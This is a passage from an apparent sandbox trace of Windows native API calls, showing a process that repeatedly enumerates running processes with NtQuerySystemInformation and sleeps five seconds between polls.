RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.476] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.483] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.490] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.497] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.499] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.503] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.509] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.517] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.525] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.533] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.539] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.547] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.554] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.562] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.569] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.577] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.584] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.603] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.610] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.617] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.623] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) 